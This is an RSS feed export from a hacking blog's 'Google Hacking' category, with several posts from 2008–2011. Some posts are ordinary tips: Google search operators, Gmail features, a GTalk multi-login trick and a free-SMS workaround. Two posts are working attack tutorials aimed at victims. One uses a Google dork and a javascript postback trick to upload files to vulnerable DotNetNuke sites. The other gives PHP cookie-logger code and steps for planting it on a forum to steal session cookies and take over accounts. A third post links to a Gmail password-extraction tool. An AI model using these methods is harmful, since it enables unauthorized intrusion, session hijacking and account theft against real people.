<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Google Hacking</title>
	<atom:link href="http://www.hungry-hackers.com/category/google-hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>DNN (DotNetNuke) Hacking</title>
		<link>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html#comments</comments>
		<pubDate>Sat, 05 Feb 2011 08:54:38 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Dot Net Nuke]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Website]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1744</guid>
		<description><![CDATA[<p>Hello Friends,</p>
<p>Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.</p>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/5032283818_25b45d519c.jpg"><img class="alignleft size-medium wp-image-1750" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/5032283818_25b45d519c-300x225.jpg" alt="" width="300" height="225" /></a>Hello Friends,</p>
<p style="text-align: justify">Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.</p>
<p style="text-align: justify">DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.<span id="more-1744"></span></p>
<p style="text-align: justify">Below are the easy steps to implement the attack:</p>
<ul style="text-align: justify">
<li>First use a google dork to find the appropriate target.</li>
</ul>
<blockquote><p><em> inurl:&#8221;/portals/0&#8243; site:.com </em></p></blockquote>
<ul style="text-align: justify">
<li>You can change com to your desired domain name like bd ph ae</li>
<li>Now search your website on the google after searching you will get many websites choose any one of it.</li>
</ul>
<ul style="text-align: justify">
<li>Its time to check the required vulnerability on the website just place this code after the web address.</li>
</ul>
<blockquote><p><em> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx </em></p></blockquote>
<ul style="text-align: justify">
<li>For example if you got <em>www.victim.com</em></li>
<li>Replace it <em>www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</em></li>
<li>If you will get this screen means this web is going to hack.</li>
</ul>
<p style="text-align: justify"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1.jpg"></a></p>
<p style="text-align: center"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1.jpg"><img class="size-medium wp-image-1745     aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn1-300x279.jpg" alt="" width="300" height="279" /></a></p>
<p style="text-align: justify">
<ul style="text-align: justify">
<li>Now choose the third option &#8220;A File On Your Site&#8221; And than paste this java code on your address bar.</li>
</ul>
<blockquote><p>javascript:__doPostBack(&#8216;ctlURL$cmdUpload&#8217;,&#8221;)</p></blockquote>
<ul style="text-align: justify">
<li>It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.</li>
</ul>
<p style="text-align: justify">
<ul style="text-align: justify">
<li>After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension</li>
</ul>
<p style="text-align: justify">here extension is txt jpg swf etc.</p>
<ul style="text-align: justify">
<li>In our case</li>
</ul>
<blockquote><p><em>www.victim.com/portals/0/b.txt </em></p></blockquote>
<p style="text-align: left"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn3.jpg"><img class="size-medium wp-image-1746   aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/dnn3-300x176.jpg" alt="" width="300" height="176" /></a><strong> </strong></p>
<p style="text-align: left">
<p style="text-align: left"><strong>About The Author</strong></p>
<p style="text-align: left"><strong>Irfan Shakeel </strong>is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical <a href="http://www.ehacking.net" target="_blank">Hacking Blog.</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1744&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/dnn-dotnetnuke-hacking.html/feed</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>How to Send free SMS Worldwide?</title>
		<link>http://www.hungry-hackers.com/2011/01/how-to-send-free-sms-worldwide.html</link>
		<comments>http://www.hungry-hackers.com/2011/01/how-to-send-free-sms-worldwide.html#comments</comments>
		<pubDate>Sat, 22 Jan 2011 13:07:14 +0000</pubDate>
		<dc:creator>Dinesh Agarwal</dc:creator>
				<category><![CDATA[Free Call Hacks]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Google News]]></category>
		<category><![CDATA[iPhone Hacks]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[VoIP Hacks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[SMS]]></category>
		<category><![CDATA[Voice]]></category>
		<category><![CDATA[worldwide]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1711</guid>
		<description><![CDATA[Most of you might have heard about Google Voice which provides great free VOIP service within USA. However, Google Voice is not free for people outside USA. When you try to visit Google Voice home page from anywhere but USA, it says that Google Voice is not available in your country. Today, we bring you a hack that will let you use Google Voice to send and receive free SMS anywhere in the world.]]></description>
			<content:encoded><![CDATA[<p>This post is written by Mr. Dinesh Agarwal of <a href="http://www.freecallshub.com" target="_blank">Free Calls Hub</a>.</p>
<p style="text-align: justify;"><img class="alignright size-full wp-image-1713" src="http://www.hungry-hackers.com/wp-content/uploads/2011/01/4266534224_1bec7e19c7_m.jpg" alt="Free SMS using Google Voice" width="250" height="254" />Most of you might have heard about Google Voice which provides great free VOIP service within USA. However, Google Voice is not free for people outside USA. When you try to visit Google Voice home page from anywhere but USA, it says that Google Voice is not available in your country. Today, we bring you a hack that will let you use Google Voice to send and receive free SMS anywhere in the world.</p>
<p><strong>Requirements:</strong></p>
<ul>
<li>A smart Phone (iPhone, Blackberry or other smart phones)</li>
<li>Internet connection</li>
<li>Two Google Voice Accounts</li>
</ul>
<p><strong>Steps</strong></p>
<p>If you have a smart phone you can <strong>download the google voice application</strong> for it. If Google does not have an application for your device you can still use web version which you can access from your phone&#8217;s web browser.</p>
<p>You will need a Google voice Account . If you are outside USA you can use a proxy such as <a title="Hide Link Online" href="http://www.hidelinkonline.com/" target="_blank">hidelinkonline</a> to create Google Voice account. Remember that you will need one account for each person that you want to send (or receive) SMS to (from). Google Voice comes with a USA phone number that you have the option to choose from host of numbers.</p>
<p>Once you have the accounts set up you can login to your phone using this information. The good thing is that this application works on GPRS too. Moreover, you can use GPRS without the special data plan for iPhone.</p>
<p>After you have logged into your application successfully, you can send SMS to any number in USA and Canada. Since all your friends now have a Google Voice Number you can sms them and they can reply back on your Google voice number. Your friends or partners need not be within the same country. They can be anywhere in the world. This is totally free SMS service for you.</p>
<p>If you liked this post please subscribe to Mr. Dinesh Agarwal&#8217;s Voip weblog <a href="http://www.freecallshub.com" target="_blank">Free Calls Hub</a>.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1711&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/01/how-to-send-free-sms-worldwide.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Login to Multiple Accounts Using Gtalk</title>
		<link>http://www.hungry-hackers.com/2009/03/login-to-multiple-accounts-using-gtalk.html</link>
		<comments>http://www.hungry-hackers.com/2009/03/login-to-multiple-accounts-using-gtalk.html#comments</comments>
		<pubDate>Thu, 26 Mar 2009 12:38:25 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[GTalk]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Login]]></category>
		<category><![CDATA[Multiple]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tricks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=562</guid>
		<description><![CDATA[Have Multiple Google Accounts?
And want to login with both of them on Gtalk on single PC?

This is what I wanted to do as I’ve got two Google IDs, so I found out the way to run multiple GTalks simultaneously…]]></description>
			<content:encoded><![CDATA[<div class="topContent">
<p><a href="http://www.hungry-hackers.com/wp-content/uploads/2009/03/multiple-gtalk.gif"><img class="alignright size-full wp-image-564" title="multiple-gtalk" src="http://www.hungry-hackers.com/wp-content/uploads/2009/03/multiple-gtalk.gif" alt="multiple-gtalk" width="290" height="255" /></a>Have Multiple Google Accounts?<br />
And want to login with both of them on Gtalk on single PC?</p>
<p>This is what I wanted to do as I’ve got two Google IDs, so I found out the way to run multiple GTalks simultaneously…</p>
<p>How to do it:</p>
<ol>
<li>Create a shortcut to GTalk on your desktop (if you dont have currently).</li>
<li>Go to the properties of the shortcut. There in the target, you’ll see something like: “C:\Program Files\Google\Google Talk\googletalk.exe”</li>
<li>Add <em><strong>/nomutex</strong></em> to that target line. Then the line would be (<strong>Include the Quotes in the address</strong>) :<br />
<blockquote><p><em><strong>“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex</strong></em></p></blockquote>
</li>
<li>“<em><strong>Apply</strong></em>” it and then click “<strong><em>Ok</em></strong>”.</li>
<li>Check out if it works, Enjoy Multi-GTalks!</li>
</ol>
<p>Don’t forget to leave comments here if this works…[:)]</p>
<p><strong>How this Works:</strong></p>
<p>The <em><strong>mutex</strong></em> is short for <em><strong>mut</strong>ual <strong>ex</strong>clusion object</em>. A <em>mutex</em> is a <em>program object</em> that allows multiple program threads to share the same resource, but not simultaneously.</p>
<p>So, in the hack above, we used <em><strong>nomutex</strong></em> (no-mutex) so to use the same resources simultaneously…</div>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=562&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/03/login-to-multiple-accounts-using-gtalk.html/feed</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>Recover your Forgotten Passwords for Free</title>
		<link>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html#comments</comments>
		<pubDate>Mon, 24 Nov 2008 08:06:02 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Decryption]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Password Recovery]]></category>
		<category><![CDATA[Spoofing]]></category>
		<category><![CDATA[GMail]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[Recovery]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=383</guid>
		<description><![CDATA[I have got many Comments and Emails Saying that they have Forgot the Password of some email Account and now they want to get it back. Here is the Solution  to all your Emails and Comments. Gmail Password Recovery is a Software by which you can get your lost Passwords back and this is Not A JOKE. I have personally Tried and Tested it.]]></description>
			<content:encoded><![CDATA[<p>I have got many Comments and Emails Saying that they have Forgot the Password of some email Account and now they want to get it back. Here is the Solution  to all your Emails and Comments. Gmail Password Recovery is a Software by which you can get your lost Passwords back and this is True. I have personally tried and Tested it.</p>
<p>Gmail Password Recovery is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords:</p>
<ul>
<li>Google Talk</li>
<li>Gmail Notifier</li>
<li>Google Desktop</li>
<li>Picasa</li>
<li>Google Photos Screensaver</li>
<li> Internet Explorer</li>
<li>Mozilla Firefox</li>
</ul>
<p>This Cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password. In any case, if you are trying to recover the password you have long forgotten, download Gmail Password Recovery.<br />
[eminimall]<br />
<strong>Note: </strong>The Passwords Shown in the Image have been Changed so Please Don&#8217;t Try it. They are just for Demonstration</p>
<p><strong>Download Link:</strong></p>
<blockquote><p>http://w18.easy-share.com/1702541173.html</p></blockquote>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=383&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html/feed</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>Create a CookieLogger and Hack any Account</title>
		<link>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html#comments</comments>
		<pubDate>Sat, 22 Nov 2008 09:53:22 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Email Hacking]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[Cookie]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Logger]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[Orkut]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Stealling]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=377</guid>
		<description><![CDATA[Cookies stores all the necessary Information about one's account , using this information you can hack anybody's account and change his password. If you get the Cookies of theVictim you can Hack any account the Victim is Logged into. A CookieLogger is a Script that is Used to Steal anybodies Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger...Hope you will enjoy Reading it ...]]></description>
			<content:encoded><![CDATA[<p>Cookies stores all the necessary Information about one&#8217;s account , using this information you can hack anybody&#8217;s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.</p>
<p><strong>What is a CookieLogger?</strong></p>
<p>A CookieLogger is a Script that is Used to Steal anybody&#8217;s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.</p>
<p>Today I am going to show How to make your own Cookie Logger&#8230;Hope you will enjoy Reading it &#8230;</p>
<p><strong>Step 1: </strong>Save the notepad file from the link below and Rename it as Fun.gif:</p>
<blockquote><p><a title="Script1" href="http://w18.easy-share.com/1702516956.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 2: </strong>Copy the Following Script into a Notepad File and Save the file as cookielogger.php:</p>
<blockquote><p>$filename = &#8220;logfile.txt&#8221;;<br />
if (isset($_GET["cookie"]))<br />
{<br />
if (!$handle = fopen($filename, &#8216;a&#8217;))<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
else<br />
{<br />
if (fwrite($handle, &#8220;\r\n&#8221; . $_GET["cookie"]) === FALSE)<br />
{<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
}<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
fclose($handle);<br />
exit;<br />
}<br />
echo &#8220;Temporary Server Error,Sorry for the inconvenience.&#8221;;<br />
exit;<br />
?&gt;</p></blockquote>
<p><strong>Step 3: </strong>Create a new Notepad File and Save it as logfile.txt</p>
<p><strong>Step 4:</strong> Upload this file to your server</p>
<p>cookielogger.php -&gt; http://www.yoursite.com/cookielogger.php<br />
logfile.txt -&gt; http://www.yoursite.com/logfile.txt (chmod 777)<br />
fun.gif -&gt; http://www.yoursite.com/fun.gif</p>
<p>If you don&#8217;t have any Website then you can use the following Website to get a Free Website which has php support :</p>
<blockquote><p>http://0fees.net</p></blockquote>
<p><strong>Step 5: </strong>Go to the victim forum and insert this code in the signature or a post :</p>
<blockquote><p><a title="Script2" href="http://w14.easy-share.com/1702516964.html" target="_blank">Download it.</a></p></blockquote>
<p><strong>Step 6: </strong>When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:</p>
<blockquote><p>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9</p></blockquote>
<p><strong>Step 7:</strong> To get the access to the Victim&#8217;s Account you need to replace your cookies with the Victim&#8217;s Cookie. You can use a Cookie Editor for this. The string before &#8220;=&#8221; is the name of the cookie and the string after &#8220;=&#8221; is its value. So Change the values of the cookies in the cookie Editor.</p>
<p><strong>Step 8: </strong>Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim&#8217;s account information.</p>
<p><strong>Note : </strong>Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim&#8217;s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.</p>
<p><strong>Disclaimer: </strong>I don&#8217;t take Responsibility for what you do with this script, served for Educational purpose only. <strong>&#8230;</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=377&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/create-a-cookielogger-and-hack-any-account.html/feed</wfw:commentRss>
		<slash:comments>56</slash:comments>
		</item>
		<item>
		<title>Bunch of New Features in Gmail</title>
		<link>http://www.hungry-hackers.com/2008/11/bunch-of-new-features-in-gmail.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/bunch-of-new-features-in-gmail.html#comments</comments>
		<pubDate>Tue, 04 Nov 2008 07:16:24 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Internet News]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Features]]></category>
		<category><![CDATA[GMail]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Latest]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tricks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=367</guid>
		<description><![CDATA[The month of October saw a slew of additions to Google's web mail service Gmail. While one feature revs up Gmail for mobile users, adding offline support to mobile Gmail, another makes Calendars and Docs Gmail-compliant.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><span>The month of October saw a slew of additions to Google&#8217;s web mail service Gmail. While one feature revs up Gmail for mobile users, adding offline support to mobile Gmail, another makes Calendars and Docs Gmail-compliant.</span></p>
<p><span>Here&#8217;s looking into Gmail&#8217;s new features and what they promise.</span></p>
<p><span><strong>New Gadgets : </strong>This week, Google opened Gmail to further user modification by allowing users to integrate Google Gadgets in Gmail&#8217;s left-hand navigation bar. The company has provided two sample Gadgets &#8212; Google Docs and Calendar (modular mini applications). While one provides a simple way to see your Google Calendar agenda and get an alert when you in a meeting, the other shows recently opened Google Docs files and lets you search across all of your documents right from within Gmail. The Gadgets can be enabled through the Gmail Labs tab in the Settings menu. Google has also added a Gmail Labs option to `Add any gadget by URL,&#8217; which allows users to add any Gadget, the way one can while using iGoogle.</span></p>
<p><strong><span>Emoticons : </span></strong><span>Emoticons have been available on Google Chat for quite some time, but this month they made their appearance on Gmail Darren Lewis, Gmail engineer, said in a blog post, &#8220;Following the evolutionary path blazed by coloured labels, we present, in all their technicolor glory, emoticons in your mail.&#8221; Besides the common gestures like smiling or winking, the new emoticons will enable users to input images of hugs and kisses instead of `XOXO&#8217; and pictures of drinks, cake or exclamation points to help them get their points across better. Google not only added emoticons to mail messages, but also added the number of emoticons available in Google Talk.</span></p>
<p><strong><span>Gmail Mobile version 2.0 : </span></strong><span>Google has introduced Version 2.0 of Gmail for Mobile for J2ME-supported devices such as the Nokia N95, as well as BlackBerry phones. According to Derek Phillips, Software Engineer, Google mobile team, &#8220;the focus in the second iteration of the popular e-mail client was to produce a faster and more reliable experience for users.&#8221; It will also give users offline access to their mails. The offline access will let users read, edit and respond to any mail. The sending of replies (as well as downloading of new mails), however, takes place when connectivity resumes. Among the key additions, the new version lets users access multiple accounts. Those who have both a Gmail and Google Apps email account can easily switch between them quickly. Users will no longer have to use two different mobile apps to access personal and work emails.</span></p>
<p><span>There is a multiple email drafts feature where users can save multiple email drafts in their mobile phone, so that they can pick and choose what they would like to send later. Also, the new version packs powerful shortcut keys. However, Gmail Mobile version 2.0 lacks support for many phones, especially those running on Windows Mobile such as HTC handsets. However, Google said users can try installing it at their own discretion if they have a Java Virtual Machine installed.</span></p>
<p><strong><span>Google Goggles :</span></strong><span> For late night party drunkers Google has come up with a free email service that will check if users are really sure of want they are sending in the late night Friday email. For this Google has come up with a simple method that will ask users to solve a few simple math problems after they click send to verify if the sender is in the right state of mind. By default, Mail Goggles is only active late night on the weekend. Gmail users can adjust their email settings to activate the Goggles feature and dictate the times it is active.</span></p>
<p><span><strong>Canned Responses :</strong> These will allow Gmail users to save a reply they are writing as a `canned response&#8217; and then quickly select one of these responses while replying to a future e-mail. Canned Response feature is ideal for those tired of copying and pasting the same reply every time someone emails with a common question. To use the feature, a user just needs to click &#8216;Settings&#8217;, then click the &#8216;Labs&#8217; tab. In the drop down menu click &#8216;Canned Responses&#8217;, and save changes. To compose a canned response, compose a new email and type the message. When the message is composed, click the drop-down arrow next to Canned responses and select new canned response. Give it a title and save. Now your message will be available to you whenever you are composing a new message, replying to a message or forwarding a message.</span></p>
<p><span><strong>Contact manager : </strong>Google has also made a few changes to the contact manger in Gmail. Says Benjamin Grol, Product Manager, Google Contacts, in a blog post, &#8220;Up to this point, if you emailed someone five times, we&#8217;d automatically move them into My Contacts. Now, we&#8217;ll no longer automatically add contacts to your My Contacts group. Instead, you can go to Suggested Contacts, select the contacts you&#8217;d like and move them into My Contacts. All of your contacts &#8212; whether they&#8217;re in My Contacts or Suggested Contacts &#8212; will continue to show in auto-complete as you&#8217;re composing messages.&#8221;</span></p>
<p><span>As a part of this change, Google has moved previously auto-added contacts back into Suggested Contacts. Only contacts that a user has edited, imported or added to a group will remain in My Contacts. This will provide users with a clean slate and, we hope, a better point for syncing contacts with mobile devices.</span></p>
<p><strong><span>Advanced IMAP controls :</span></strong><span> IMAP controls let users further streamline their Gmail IMAP experience. Users can choose which labels to sync in IMAP. This is useful if one finds mail client choking on Gmail/All Mail folder. The IMAP protocol allows messages to be marked for deletion, a state where a message is still present in the folder but slated to be deleted the next time the folder is deleted. After enabling this, go to the Labels tab under Settings. Users will see a new &#8216;Show in IMAP&#8217; checkbox next to each of their labels. Uncheck the box and the corresponding folder will disappear from IMAP.</span></p>
<p><span>There are some other options also for users who want to make Gmail&#8217;s IMAP work more like traditional IMAP providers: turn off auto-expunge or trash messages when they&#8217;re no longer visible through IMAP.</span></p>
<p><a title="eCommerce Consulting" href="http://www.fitforcommerce.com/services.html" target="_blank">eCommerce Consulting</a> team can help ensure a successful undertaking and useful results.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=367&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/bunch-of-new-features-in-gmail.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>20 Great Google Secrets</title>
		<link>http://www.hungry-hackers.com/2008/09/20-great-google-secrets.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/20-great-google-secrets.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 16:52:19 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Hacking News]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Options]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[Secrets]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Top]]></category>
		<category><![CDATA[Tricks]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=349</guid>
		<description><![CDATA[Google is clearly the best general-purpose search engine on the Web
But most people don&#8217;t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google&#8217;s index, it&#8217;s still a struggle to pare results to a manageable number.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google&#8217;s search options go beyond simple keywords, the Web, and even its own ...]]></description>
			<content:encoded><![CDATA[<p>Google is clearly the best general-purpose search engine on the Web</p>
<p>But most people don&#8217;t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google&#8217;s index, it&#8217;s still a struggle to pare results to a manageable number.</p>
<p>But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google&#8217;s search options go beyond simple keywords, the Web, and even its own programmers. Let&#8217;s look at some of Google&#8217;s lesser-known options.</p>
<p><strong>Syntax Search Tricks</strong></p>
<p>Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at:</p>
<p>www.google.com/help/operators.html</p>
<p>Here are some advanced operators that can help narrow down your search results.</p>
<p>Intitle: at the beginning of a query word or phrase (intitle:&#8221;Three Blind Mice&#8221;) restricts your search results to just the titles of Web pages.</p>
<p>Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you&#8217;re searching for might commonly appear in URLs. If you&#8217;re looking for the term HTML, for example, and you don&#8217;t want to get results such as</p>
<p>www.mysite.com/index.html</p>
<p>You can also enter intext:html.</p>
<p>Link: lets you see which pages are linking to your Web page or to another page you&#8217;re interested in. For example, try typing in</p>
<p>link:http://www.hungry-hackers.com</p>
<p>Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:&#8221;Mark Twain&#8221;site:edu. Experiment with mixing various elements; you&#8217;ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.</p>
<p><strong>Swiss Army Google</strong></p>
<p style="text-align: justify;">Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature</p>
<p>(www.google.com/help/features.html#calculator)</p>
<p>Lets you do both math and a variety of conversions from the search box. For extra fun, try the query &#8220;Answer to life the universe and everything.&#8221;</p>
<p>Let Google help you figure out whether you&#8217;ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try &#8220;thre blund mise&#8221;) and Google may suggest a proper spelling. This doesn&#8217;t always succeed; it works best when the word you&#8217;re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you&#8217;re searching for &#8220;three blind mice,&#8221; underneath the search window will appear a statement such as Searched the web for &#8220;three blind mice.&#8221;) You&#8217;ll discover that you can click on each word in your search phrase and get a definition from a dictionary.</p>
<p>Suppose you want to contact someone and don&#8217;t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you&#8217;ll see it at the top of the search results along with a map link to the address. If you&#8217;d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you&#8217;d rather use a search form for business phone listings, try Yellow Search</p>
<p>(www.buzztoolbox.com/google/yellowsearch.shtml).</p>
<p><strong>Extended Googling</strong></p>
<p>Google offers several services that give you a head start in focusing your search. Google Groups</p>
<p>(http://groups.google.com)</p>
<p>indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle<br />
CODE<br />
(http://froogle.google.com),</p>
<p>which indexes products from online stores, and Google Catalogs<br />
CODE<br />
(http://catalogs.google.com),</p>
